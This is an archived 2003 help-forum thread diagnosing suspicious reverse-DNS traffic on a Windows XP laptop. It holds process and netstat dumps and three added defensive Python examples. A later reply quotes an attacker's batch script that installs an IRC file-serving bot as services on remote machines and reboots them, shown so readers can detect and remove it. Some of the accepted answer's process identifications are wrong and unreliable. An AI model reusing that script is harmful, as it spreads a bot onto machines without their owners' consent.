Solved

Suspicious DNS activity

Posted on 2003-03-27
Last Modified: 2013-11-16
Hello,

I'm running Win XP Pro on an IBM Thinkpad T30. Recently, my laptop started performing internet accesses even though there should be none. When I reboot my system (to start afresh), my ZoneAlarm shows continuous internet accesses from scvhost.exe (Generic Host Process under win32). I fired up Ethereal and found tons of reverse DNS requests to weird addresses such as pc-62-30-198-107-sm.blueyonder.co.uk, p50915B1A.dip.t-dialin.net, adsl-213-190-42-6.takas.lt, 213-97-171-45.uc.nombres.ttd.es, some to surfer.at, some to wanadoo.fr, etc., etc.

I've tried running fport from foundstone, but it always returns an empty table/list.

Any ideas what is going on, and how to fix it?

Thanks!
0
Question by:Selcon
20 Comments
 
LVL 18

Expert Comment

by:liddler
ID: 8218236
First guess would be some spyware or virus. Download and run the excellent and free Ad-aware (http://www.lavasoftusa.com/) to check for spyware, and run your AV software with the latest definitions.
 
0
 

Author Comment

by:Selcon
ID: 8218272
I also ran Ad-aware (with the latest RefUpdate) as well as a Norton Antivirus scan (with the latest DB), but both turned up nothing.
0
 

Expert Comment

by:JacksonGalloway
ID: 8218287
What is running when you show the tasklist? Also, did you try running msconfig, checking the Startup tab, and turning off programs from starting up?
Thanks,
Jackson
0
 

Author Comment

by:Selcon
ID: 8218349
Yes I recently went through the startup programs in the registry and msconfig/startup tab.

Here's a dump from running tasklist (initial dump to check formatting)
Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         20 K
System                         4 Console                 0         36 K
smss.exe                     636 Console                 0         52 K
0
 

Author Comment

by:Selcon
ID: 8218362
Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         20 K
System                         4 Console                 0         36 K
smss.exe                     636 Console                 0         52 K
csrss.exe                    688 Console                 0      3,036 K
winlogon.exe                 712 Console                 0        576 K
services.exe                 756 Console                 0      1,068 K
lsass.exe                    768 Console                 0      1,284 K
ibmpmsvc.exe                 956 Console                 0        160 K
svchost.exe                 1004 Console                 0      1,224 K
svchost.exe                 1112 Console                 0      7,404 K
svchost.exe                 1364 Console                 0      1,404 K
svchost.exe                 1448 Console                 0        764 K
spoolsv.exe                 1592 Console                 0        792 K
CDAC11BA.EXE                1772 Console                 0        224 K
defwatch.exe                1800 Console                 0        264 K
Runservice.exe              1824 Console                 0        264 K
rtvscan.exe                 1840 Console                 0      2,924 K
QCONSVC.EXE                 1864 Console                 0        264 K
svchost.exe                 1916 Console                 0      1,196 K
vsmon.exe                   1932 Console                 0      3,656 K
explorer.exe                 868 Console                 0     28,048 K
MSGSYS.EXE                  1300 Console                 0        208 K
SynTPLpr.exe                 276 Console                 0        452 K
SynTPEnh.exe                 360 Console                 0        864 K
rundll32.exe                 468 Console                 0        712 K
TPHKMGR.exe                  536 Console                 0        836 K
IMWEBSTA.exe                 668 Console                 0      1,008 K
NDetect.exe                  732 Console                 0      1,052 K
vptray.exe                  1092 Console                 0        868 K
dpps2.exe                   1492 Console                 0      1,140 K
evntsvc.exe                 1548 Console                 0        120 K
ctfmon.exe                  1560 Console                 0      1,940 K
kstatus.exe                 1028 Console                 0      1,532 K
zonealarm.exe                216 Console                 0      3,196 K
iexplore.exe                4004 Console                 0     19,200 K
iexplore.exe                2100 Console                 0     17,228 K
cmd.exe                     3224 Console                 0      1,628 K
tasklist.exe                 660 Console                 0      4,336 K
wmiprvse.exe                3616 Console                 0      5,012 K
0
 
LVL 2

Expert Comment

by:Jason_Deckard
ID: 8219736
I'm curious to see the results of "netstat -na" after a clean boot, to see who (if anyone) your computer is talking to.


Cheers,
Jason
0
 
LVL 1

Expert Comment

by:newyhouse
ID: 8220912
At the time you checked your process list, did you have a command shell open?  I see cmd.exe in there, but did YOU open it?  Hackers often "shovel" shells to themselves using tools like netcat bound to cmd.exe (so they have total control over your computer remotely).  If you didn't launch cmd.exe, this would seem likely.  In that case, Jason Deckard is right, run netstat and see what ports are listening. It sounds fishy to me...

Also, some of the mystery addresses appear to be dial-in addresses which would suggest that the activity isn't advertisement related.  
0
 
LVL 24

Expert Comment

by:SunBow
ID: 8221365
yeah, thank the lord for the monitoring/closings of a ZA product.

blueyonder: http://www.bygames.com/
What is CDAC11BA.EXE? It looks similar to one of their code acronyms. And why... are you running so many explorers and DOS programs at plain simple startup?

Did you install a game and enable networking, phone access, and register via dialup?
0
 

Accepted Solution

by:
JacksonGalloway earned 1000 total points
ID: 8221747
The CDAC11BA.EXE process is something to do with TurboTax, I think; that was after a 2 minute search on Yahoo.

The defwatch.exe process is something to do with Norton Antivirus.

Runservice.exe is used to launch programs as a service on Windows NT/2000; it is provided by Microsoft.

The rtvscan.exe process is something to do with Norton Antivirus.

From what I could gather, qconsvc is something to do with IBM software.

vsmon is part of the ZoneAlarm personal firewall software package.

msgsys.exe is part of Norton/Intel for some type of network card.

SynTPLpr.exe is a touchpad controller of some sort.

SynTPEnh.exe is also a touchpad controller of some kind.

TPHKMGR.exe is part of the ThinkPad software package.

IMWEBSTA.exe is for wireless LAN on the ThinkPad.

ndetect is part of the ICQ software, used to detect an internet connection.

vptray.exe is part of the Norton suite that checks email for viruses.

dpps2.exe is part of the Panicware popup killer software package.

evntsvc.exe is part of the RealNetworks player.

ctfmon.exe is part of the Office suite to interpret text to speech.

kstatus.exe has something to do with Kerberos for Windows.

zonealarm.exe is a firewall, I think.

wmiprvse.exe is some sort of quick shared Win 98/Me network access.

SO, use msconfig, turn everything off at startup, and then re-run the task manager and see what you've got.
thanks,
jackson
0
 

Author Comment

by:Selcon
ID: 8222226
To newyhouse: yes, I opened the command window to run the tasklist command.

To SunBow: two IE windows were open at that time, one to the Experts Exchange website and another to Google. Nope, didn't install any games recently.

To Jackson:
Here is a dump of netstat -an, currently without turning everything off (which I hate to do :). The suspicious DNS requests are still continuing right now as I am dumping the netstat -an results.

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1920           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING
  TCP    192.168.0.69:139       0.0.0.0:0              LISTENING
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:500            *:*
  UDP    0.0.0.0:1026           *:*
  UDP    0.0.0.0:1027           *:*
  UDP    0.0.0.0:1086           *:*
  UDP    0.0.0.0:38037          *:*
  UDP    127.0.0.1:123          *:*
  UDP    127.0.0.1:1790         *:*
  UDP    127.0.0.1:1900         *:*
  UDP    192.168.0.69:123       *:*
  UDP    192.168.0.69:137       *:*
  UDP    192.168.0.69:138       *:*
  UDP    192.168.0.69:1900      *:*
0
 

Author Comment

by:Selcon
ID: 8222238
192.168.0.69 is the internal IP address of my laptop, by the way; I'm running my home network through a software NAT with a DSL provider (single IP). The gateway (just running the software NAT) is 192.168.0.1.
0
 

Author Comment

by:Selcon
ID: 8222363
OK, I removed everything under the Startup tab in msconfig except for ZoneAlarm and Norton Antivirus. I haven't removed the services yet, but this is what I get. The reverse DNS activity is still continuing, and here's a dump of netstat -an:

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING
  TCP    192.168.0.69:139       0.0.0.0:0              LISTENING
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:500            *:*
  UDP    0.0.0.0:1026           *:*
  UDP    0.0.0.0:38037          *:*
  UDP    127.0.0.1:123          *:*
  UDP    127.0.0.1:1900         *:*
  UDP    192.168.0.69:123       *:*
  UDP    192.168.0.69:137       *:*
  UDP    192.168.0.69:138       *:*
  UDP    192.168.0.69:1900      *:*

and here's a dump of tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         20 K
System                         4 Console                 0        224 K
smss.exe                     628 Console                 0        344 K
csrss.exe                    684 Console                 0      3,976 K
winlogon.exe                 708 Console                 0      2,340 K
services.exe                 752 Console                 0      2,916 K
lsass.exe                    764 Console                 0      5,296 K
ibmpmsvc.exe                 948 Console                 0      1,160 K
svchost.exe                  992 Console                 0      2,796 K
svchost.exe                 1100 Console                 0     19,820 K
svchost.exe                 1360 Console                 0      1,972 K
svchost.exe                 1372 Console                 0      3,376 K
spoolsv.exe                 1636 Console                 0      6,056 K
defwatch.exe                1820 Console                 0      1,384 K
Runservice.exe              1844 Console                 0      1,424 K
rtvscan.exe                 1904 Console                 0     10,488 K
QCONSVC.EXE                 1944 Console                 0      1,420 K
svchost.exe                 1972 Console                 0      2,676 K
vsmon.exe                   1992 Console                 0      5,532 K
MSGSYS.EXE                   552 Console                 0      2,100 K
explorer.exe                1084 Console                 0     24,084 K
vptray.exe                  2044 Console                 0      6,048 K
msconfig.exe                1756 Console                 0      5,040 K
kstatus.exe                  584 Console                 0      2,828 K
zonealarm.exe               1136 Console                 0      7,316 K
cmd.exe                     1656 Console                 0      1,572 K
tasklist.exe                1488 Console                 0      3,912 K
wmiprvse.exe                1164 Console                 0      5,032 K

0
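The two netstat -an dumps Selcon posted, before and after trimming the Startup tab, lend themselves to a mechanical comparison rather than eyeballing. The following Python is an added example for this thread, not code posted by anyone in it: it parses the XP-style netstat text, classifies each socket by who can reach it (loopback only, one interface, or all interfaces), lists the ports a remote peer could actually hit, and diffs the two snapshots so the sockets that disappeared (the TCP 1920 listener and three UDP ports) are reported explicitly. The two snapshots are embedded as the sample input and the port labels are standard Windows defaults; anything unlabelled needs its owning process identified (netstat -o on XP, or a port-to-process mapper such as the fport mentioned in the question).

```python
"""Parse and diff two `netstat -an` snapshots (Windows XP text layout).

Added example for this thread, not code posted by anyone in it. BEFORE and AFTER
are the two dumps Selcon posted before and after clearing the msconfig Startup
tab; the port labels are standard Windows defaults.
"""
from typing import NamedTuple

BEFORE = """\
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1920           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING
  TCP    192.168.0.69:139       0.0.0.0:0              LISTENING
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:500            *:*
  UDP    0.0.0.0:1026           *:*
  UDP    0.0.0.0:1027           *:*
  UDP    0.0.0.0:1086           *:*
  UDP    0.0.0.0:38037          *:*
  UDP    127.0.0.1:123          *:*
  UDP    127.0.0.1:1790         *:*
  UDP    127.0.0.1:1900         *:*
  UDP    192.168.0.69:123       *:*
  UDP    192.168.0.69:137       *:*
  UDP    192.168.0.69:138       *:*
  UDP    192.168.0.69:1900      *:*
"""

AFTER = """\
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING
  TCP    192.168.0.69:139       0.0.0.0:0              LISTENING
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:500            *:*
  UDP    0.0.0.0:1026           *:*
  UDP    0.0.0.0:38037          *:*
  UDP    127.0.0.1:123          *:*
  UDP    127.0.0.1:1900         *:*
  UDP    192.168.0.69:123       *:*
  UDP    192.168.0.69:137       *:*
  UDP    192.168.0.69:138       *:*
  UDP    192.168.0.69:1900      *:*
"""

# Standard Windows XP defaults for the ports seen above; anything else needs
# its owning process identified (netstat -o, or a port-to-process mapper).
WELL_KNOWN = {
    ("TCP", 135): "RPC endpoint mapper", ("TCP", 139): "NetBIOS session",
    ("TCP", 445): "SMB over TCP", ("TCP", 5000): "UPnP device host",
    ("UDP", 123): "NTP (w32time)", ("UDP", 137): "NetBIOS name service",
    ("UDP", 138): "NetBIOS datagram", ("UDP", 445): "SMB", ("UDP", 500): "IKE",
    ("UDP", 1900): "SSDP discovery",
}

class Sock(NamedTuple):
    proto: str  # "TCP" or "UDP"
    local: str  # "address:port" exactly as netstat prints it
    state: str  # TCP state column; "" for UDP, which has none

def parse_netstat(text):
    """Return the set of sockets in a `netstat -an` dump, skipping headers."""
    socks = set()
    for parts in (line.split() for line in text.splitlines()):
        if len(parts) >= 3 and parts[0] in ("TCP", "UDP"):
            state = parts[3] if parts[0] == "TCP" and len(parts) > 3 else ""
            socks.add(Sock(parts[0], parts[1], state))
    return socks

def exposure(sock):
    """Who can reach the socket: loopback only, every interface, or one NIC."""
    addr = sock.local.rsplit(":", 1)[0]
    return {"127.0.0.1": "loopback-only", "0.0.0.0": "all-interfaces"}.get(addr, "one-interface")

def reachable_ports(socks):
    """Ports a remote peer could hit: LISTENING TCP sockets plus every bound
    UDP socket (UDP has no state), excluding loopback bindings."""
    out = {"TCP": set(), "UDP": set()}
    for s in socks:
        if (s.proto == "UDP" or s.state == "LISTENING") and exposure(s) != "loopback-only":
            out[s.proto].add(int(s.local.rsplit(":", 1)[1]))
    return out

def diff_snapshots(before, after):
    """(sockets that disappeared, sockets that appeared) between two dumps."""
    return before - after, after - before

if __name__ == "__main__":
    gone, new = diff_snapshots(parse_netstat(BEFORE), parse_netstat(AFTER))
    for s in sorted(gone):
        port = int(s.local.rsplit(":", 1)[1])
        print("closed:", s.proto, s.local, exposure(s), WELL_KNOWN.get((s.proto, port), "unknown owner"))
    print("opened:", sorted(new) or "none")
    print("still reachable:", reachable_ports(parse_netstat(AFTER)))
```

Run as a script it prints the four sockets that closed when the startup items went away, none of which carry a well-known label, which is exactly the set worth mapping back to a process. Treating every bound UDP socket as reachable is deliberate: netstat prints no state for UDP, so a bound UDP port is as exposed as a TCP listener.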
 

Author Comment

by:Selcon
ID: 8222601
Alright, I have stopped all services except for

DNS Client
Windows management instrumentation
Event Log
IBM PM Service
Plug and Play
QCONSVB
RPC
Security Accounts Manager
TrueVector Monitor (Zonealarm)
Windows Audio
terminal services

The first two (DNS and mgnt instru) can be stopped, but stopping DNS will not 'solve' the problem, and management instrumentation has lots of warnings against stopping it.
The rest of the services cannot be stopped.

This is the current netstat -an output

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    192.168.0.69:139       0.0.0.0:0              LISTENING
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:1026           *:*
  UDP    127.0.0.1:1067         *:*
  UDP    192.168.0.69:137       *:*
  UDP    192.168.0.69:138       *:*

and this is the current tasklist output (I've removed things such as cmd.exe, regedit.exe, etc., which weren't present until I ran them)

System Idle Process            0                         0         20 K
System                         4                         0        128 K
smss.exe                     628                         0        232 K
csrss.exe                    684                         0      2,860 K
winlogon.exe                 708                         0      2,596 K
services.exe                 752                         0      2,648 K
lsass.exe                    764                         0      1,268 K
ibmpmsvc.exe                 948                         0        712 K
svchost.exe                  992                         0      2,348 K
svchost.exe                 1100                         0     13,648 K
svchost.exe                 1360                         0      1,708 K
QCONSVC.EXE                 1944                         0        948 K
vsmon.exe                   1992                         0      4,852 K
explorer.exe                1084                         0     25,376 K
zonealarm.exe               1136                         0      2,876 K
mmc.exe                     1076                         0     13,612 K
svchost.exe                  212                         0      2,712 K
wmiprvse.exe                1088                         0      4,300 K

0
 


Author Comment

by:Selcon
ID: 8222693
The troublesome thing is that every application on the system makes DNS requests through svchost.exe, and I have no idea how to make svchost report which application is making those requests or who it is returning the results to.

From the looks of the processes left in the tasklist (is there some way a process can hide from the tasklist display?), it seems that I have a trojaned program.
0
 

Author Comment

by:Selcon
ID: 8222943
OK, I've found the source of the problem.
ZoneAlarm was the one that's making the reverse DNS requests. It was blocking lots of packets directed to my laptop and resolving the source IPs to display the hostname in the alert logs.

And the reason I was getting so many packets was because I used to run eMule (a P2P program), and apparently eMule clients cache lists of IPs that have the file they want and just keep probing to see if the client is alive.

Thanks for all the help, people!
(Should I just award the points to whoever did the most work?)
0
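Selcon's finding, that the PTR queries came from ZoneAlarm resolving the source addresses of packets it had blocked, can be confirmed rather than inferred by correlating the two data sources. The following Python is an added example for this thread, not code from any poster or from ZoneAlarm: it decodes in-addr.arpa query names back to IPv4 addresses, extracts the source IPs from inbound-block log lines, and reports which reverse lookups are explained by a block entry and which are not. Both inputs are constructed samples: the DNS lines mimic a one-line capture summary, the firewall lines only approximate ZoneAlarm's comma-separated log (not its exact format), and the addresses are the ones embedded in the hostnames Selcon quoted plus 203.0.113.9 from the documentation range.

```python
"""Correlate reverse-DNS (PTR) queries seen on the wire with the source IPs a
host firewall logged as blocked.

Added example for this thread, not code from any poster or from ZoneAlarm.
DNS_QUERIES mimics a one-line capture summary and FIREWALL_LOG approximates
ZoneAlarm's comma-separated log; both are constructed samples.
"""
import ipaddress
import re

# Constructed: PTR queries for the peers in the hostnames Selcon quoted, one for
# the gateway, and an unrelated A query. p50915B1A.dip.t-dialin.net spells its
# address in hex: 50.91.5B.1A -> 80.145.91.26.
DNS_QUERIES = """\
192.168.0.69 -> 192.168.0.1 DNS Standard query PTR 107.198.30.62.in-addr.arpa
192.168.0.69 -> 192.168.0.1 DNS Standard query PTR 26.91.145.80.in-addr.arpa
192.168.0.69 -> 192.168.0.1 DNS Standard query PTR 6.42.190.213.in-addr.arpa
192.168.0.69 -> 192.168.0.1 DNS Standard query PTR 45.171.97.213.in-addr.arpa
192.168.0.69 -> 192.168.0.1 DNS Standard query PTR 1.0.168.192.in-addr.arpa
192.168.0.69 -> 192.168.0.1 DNS Standard query A www.experts-exchange.com
"""

# Constructed: inbound blocks (FWIN). Fields: type,date,time,src:port,dst:port,proto.
# 4662/4672 are eMule's default TCP/UDP ports, matching Selcon's explanation;
# 203.0.113.9 is a documentation-range address for a peer not yet looked up.
FIREWALL_LOG = """\
FWIN,2003/03/27,21:02:14,62.30.198.107:4662,192.168.0.69:4662,TCP
FWIN,2003/03/27,21:02:15,80.145.91.26:4672,192.168.0.69:4672,UDP
FWIN,2003/03/27,21:02:17,213.190.42.6:1034,192.168.0.69:4662,TCP
FWIN,2003/03/27,21:02:19,213.97.171.45:2207,192.168.0.69:4662,TCP
FWIN,2003/03/27,21:02:20,203.0.113.9:3251,192.168.0.69:4662,TCP
"""


def ptr_name_to_ip(qname):
    """'107.198.30.62.in-addr.arpa.' -> '62.30.198.107'; None if not an IPv4 PTR name."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) != 6 or labels[4:] != ["in-addr", "arpa"]:
        return None
    try:
        return str(ipaddress.IPv4Address(".".join(reversed(labels[:4]))))
    except ipaddress.AddressValueError:  # e.g. an octet above 255
        return None


def ptr_targets(dns_text):
    """Set of IPv4 addresses being reverse-resolved in a capture summary."""
    targets = set()
    for match in re.finditer(r"\bPTR\s+(\S+)", dns_text):
        ip = ptr_name_to_ip(match.group(1))
        if ip:
            targets.add(ip)
    return targets


def blocked_sources(fw_text):
    """Source IPs of inbound packets the firewall dropped."""
    sources = set()
    for line in fw_text.splitlines():
        fields = line.split(",")
        if len(fields) >= 5 and fields[0] == "FWIN":
            sources.add(fields[3].rsplit(":", 1)[0])
    return sources


def correlate(dns_text, fw_text):
    """Partition the PTR targets by whether a firewall block explains them."""
    ptr, blocked = ptr_targets(dns_text), blocked_sources(fw_text)
    return {
        "explained": ptr & blocked,             # firewall reverse-resolved a blocked peer
        "unexplained": ptr - blocked,           # something else asked for these
        "blocked_not_resolved": blocked - ptr,  # blocked, but no PTR query (yet)
    }


if __name__ == "__main__":
    result = correlate(DNS_QUERIES, FIREWALL_LOG)
    for key, ips in result.items():
        print(f"{key}: {sorted(ips)}")
    for ip in result["unexplained"]:
        scope = "local/private" if ipaddress.ip_address(ip).is_private else "external"
        print(f"  investigate {ip} ({scope}): not accounted for by firewall blocks")
```

On the sample data the four peer lookups are explained by block entries, the one lookup left over is the gateway (a private address, so a harmless candidate), and one blocked peer has not been resolved yet. The "unexplained" bucket is the one that matters for the worry raised later in the thread: reverse lookups that no local tool accounts for are the ones to chase back to a process.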
 
LVL 2

Expert Comment

by:Jason_Deckard
ID: 8224178
Selcon,

It seems *you* did most of the work :)

If you're taking suggestions, I think JacksonGalloway is most deserving of your points.
0
 
LVL 24

Expert Comment

by:SunBow
ID: 8225755
I'd sure like to know where we can get a handy list of those services myself, especially for the prime two manufacturers (MS, IBM). ZoneAlarm is at least readable; it's the real name of the product.
0
 

Author Comment

by:Selcon
ID: 8229625
Yup.
It is actually interesting, because all apps do DNS through svchost, which makes it very hard to track down the culprit, especially if it could use DNS requests/replies to hide information, maybe with a special DNS server.

0
 

Expert Comment

by:callen2003
ID: 8662401
Okkk.. SCVHOST is NOT a Microsoft installed service. SVCHOST is. SCVHOST will look like a green U when pulled up in a search window. To remove this is a very long and hard process. It's an IRC bot dropped onto your local system and forcing an FTP server to be run. It is accompanied by many, if not 10 or 20, other files which can be thrown in multiple places. Most places could be the following, from what I have seen:

C:\Winnt\System32\Drivers\etc\
c:\Winnt\Repair\
C:\Winnt\System\dump\   or Temp\
And others. You can locate it by just searching for the file SCVHOST, but do not delete until you go to that directory and find a batch file (*.BAT) in the directory. It will probably have a file called Profile or IrOffer. If you find a BAT file in the directory, open it with Notepad. You will probably see something like the following.

mkdir \\%1\azkc\winnt\repair\iro
mkdir \\%1\azkc\winnt\repair\iro\ul
copy C:\iro \\%1\azkc\winnt\repair\iro
C:\pstools \\%1 -s c:\winnt\repair\iro\netlog install log "log" "c:\winnt\repair\iro\syslog.exe c:\winnt\repair\iro\sample.config" automatic
C:\pstools \\%1 -s c:\winnt\repair\iro\netlog install log2 "log2" "c:\winnt\repair\iro\sysbk.exe c:\winnt\repair\iro\sysbk.ini" automatic
C:\pstools \\%1 -s c:\winnt\repair\iro\reg update hklm\system\currentcontrolset\services\lanmanserver\start=3
C:\pstools \\%1 -s c:\winnt\repair\iro\reg update hklm\system\currentcontrolset\services\browser\start=3
C:\pstools\psshutdown -t 2 -r \\%1
If No Critical Errors Then %1 is ROOTED...


If this is found then you have been "Rooted" by some IRC junkie who is trying to serve files. You will see about 10 files like the following:

cygwin1.dll
netlog.exe
pkzip.exe
reg.exe
sample.config
ssleay32.dll
sysbk.exe
tzolibr.dll


Some of the files can be renamed, and will be by the attacker who planted them. But the .Config is a definite, since IrOffer needs that as its extension.

If anyone needs any help, just throw me an email back and I will be glad to walk anyone through the process of removing these.


Thanks,
Chris Allen
aka ScriptJunkie
0
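As an added, defender-side illustration (not code from callen2003 or part of the post), the hunting logic the post describes, a scvhost binary sitting next to a .BAT and a .config among a cluster of the files listed, can be scripted as a co-occurrence check rather than a search for single filenames, since reg.exe, cygwin1.dll and pkzip.exe are common on clean machines too. The indicator names are taken from the post (scvhost is assumed to carry an .exe extension), the scoring weights and threshold are illustrative assumptions, and the sample tree is constructed in a temporary directory so the script runs offline.

```python
"""Hunt a directory tree for the file cluster callen2003 describes (an
IrOffer-style IRC file-serving bot), reporting only directories where several
indicators co-occur.

Added example for this thread, not code from the poster. The indicator names
come from the post; the weights and threshold are illustrative assumptions, and
the sample tree is constructed in a temp directory so the script runs offline.
"""
import os
import shutil
import tempfile

# File names listed in the post (lower-cased for case-insensitive matching);
# "scvhost.exe" assumes the .exe extension, which the post does not state.
INDICATOR_FILES = {"scvhost.exe", "cygwin1.dll", "netlog.exe", "pkzip.exe", "reg.exe",
                   "sample.config", "ssleay32.dll", "sysbk.exe", "tzolibr.dll"}
# Common on clean systems; they only count when other indicators are present.
WEAK_ALONE = {"reg.exe", "cygwin1.dll", "pkzip.exe"}


def score_directory(names):
    """Score one directory's file names; returns (score, matched indicator names)."""
    lower = {n.lower() for n in names}
    matched = lower & INDICATOR_FILES
    has_bat = any(n.endswith(".bat") for n in lower)
    has_config = any(n.endswith(".config") for n in lower)
    score = len(matched - WEAK_ALONE)          # strong names count one each
    if matched and has_bat:                    # a dropper .BAT beside indicators
        score += 1
    if matched and has_config and (has_bat or "scvhost.exe" in lower):
        score += 2                             # the IrOffer .config the post calls definite
    return score, matched


def hunt(root, threshold=2):
    """Walk `root` and return directories scoring at or above `threshold`."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        score, matched = score_directory(files)
        if score >= threshold:
            hits.append({"dir": dirpath, "score": score, "matched": sorted(matched)})
    return sorted(hits, key=lambda h: -h["score"])


def build_sample_tree():
    """Constructed fixture: one dropped-bot directory, two benign directories
    holding single common names that must not trigger on their own."""
    root = tempfile.mkdtemp(prefix="hunt_demo_")
    layout = {
        "winnt/repair/iro": ["scvhost.exe", "sample.config", "install.bat",
                             "cygwin1.dll", "netlog.exe"],
        "winnt/system32": ["reg.exe", "kernel32.dll"],
        "tools": ["pkzip.exe", "readme.txt"],
    }
    for rel, names in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(path)
        for name in names:
            open(os.path.join(path, name), "w").close()
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    try:
        for hit in hunt(root):
            print(f"{hit['score']:>2}  {hit['dir']}  {', '.join(hit['matched'])}")
    finally:
        shutil.rmtree(root)
```

Only the repair\iro directory is reported; the lone reg.exe and pkzip.exe elsewhere score zero. Point `hunt()` at a real drive root to apply the same check, and treat any hit as a reason to image the box rather than to start deleting files, since the post itself notes the attacker renames some of them.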
